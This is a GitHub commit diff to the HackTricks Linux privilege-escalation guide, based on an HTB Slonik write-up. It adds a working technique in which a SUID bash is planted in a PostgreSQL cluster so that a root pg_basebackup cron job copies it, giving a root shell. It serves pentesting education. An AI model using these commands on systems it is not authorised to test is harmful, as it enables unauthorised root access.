Skip to content

Commit d40017b

Browse files
carlospolopcarlospolop
authored
Merge pull request #1890 from HackTricks-wiki/update_HTB__Slonik_20260212_190614
HTB Slonik
2 parents 5d11636 + 92349c3 commit d40017b

1 file changed

Lines changed: 24 additions & 0 deletions

File tree

  • src/linux-hardening/privilege-escalation

src/linux-hardening/privilege-escalation/README.md

Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -559,6 +559,29 @@ for i in $(seq 1 610); do ps -e --format cmd >> /tmp/monprocs.tmp; sleep 0.1; do
559559

560560
**You can also use** [**pspy**](https://github.com/DominicBreuker/pspy/releases) (this will monitor and list every process that starts).
561561

562+
### Root backups that preserve attacker-set mode bits (pg_basebackup)
563+
564+
If a root-owned cron wraps `pg_basebackup` (or any recursive copy) against a database directory you can write to, you can plant a **SUID/SGID binary** that will be recopied as **root:root** with the same mode bits into the backup output.
565+
566+
Typical discovery flow (as a low-priv DB user):
567+
- Use `pspy` to spot a root cron calling something like `/usr/lib/postgresql/14/bin/pg_basebackup -h /var/run/postgresql -U postgres -D /opt/backups/current/` every minute.
568+
- Confirm the source cluster (e.g., `/var/lib/postgresql/14/main`) is writable by you and the destination (`/opt/backups/current`) becomes owned by root after the job.
569+
570+
Exploit:
571+
572+
```bash
573+
# As the DB service user owning the cluster directory
574+
cd /var/lib/postgresql/14/main
575+
cp /bin/bash .
576+
chmod 6777 bash
577+
578+
# Wait for the next root backup run (pg_basebackup preserves permissions)
579+
ls -l /opt/backups/current/bash # expect -rwsrwsrwx 1 root root ... bash
580+
/opt/backups/current/bash -p # root shell without dropping privileges
581+
```
582+
583+
This works because `pg_basebackup` preserves file mode bits when copying the cluster; when invoked by root the destination files inherit **root ownership + attacker-chosen SUID/SGID**. Any similar privileged backup/copy routine that keeps permissions and writes into an executable location is vulnerable.
584+
562585
### Invisible cron jobs
563586

564587
It's possible to create a cronjob **putting a carriage return after a comment** (without newline character), and the cron job will work. Example (note the carriage return char):
@@ -2132,6 +2155,7 @@ vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
21322155
- [GNU Bash Manual – BASH_ENV (non-interactive startup file)](https://www.gnu.org/software/bash/manual/bash.html#index-BASH_005fENV)
21332156
- [0xdf – HTB Environment (sudo env_keep BASH_ENV → root)](https://0xdf.gitlab.io/2025/09/06/htb-environment.html)
21342157
- [0xdf – HTB Previous (sudo terraform dev_overrides + TF_VAR symlink privesc)](https://0xdf.gitlab.io/2026/01/10/htb-previous.html)
2158+
- [0xdf – HTB Slonik (pg_basebackup cron copy → SUID bash)](https://0xdf.gitlab.io/2026/02/12/htb-slonik.html)
21352159
- [NVISO – You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
21362160
21372161
{{#include ../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)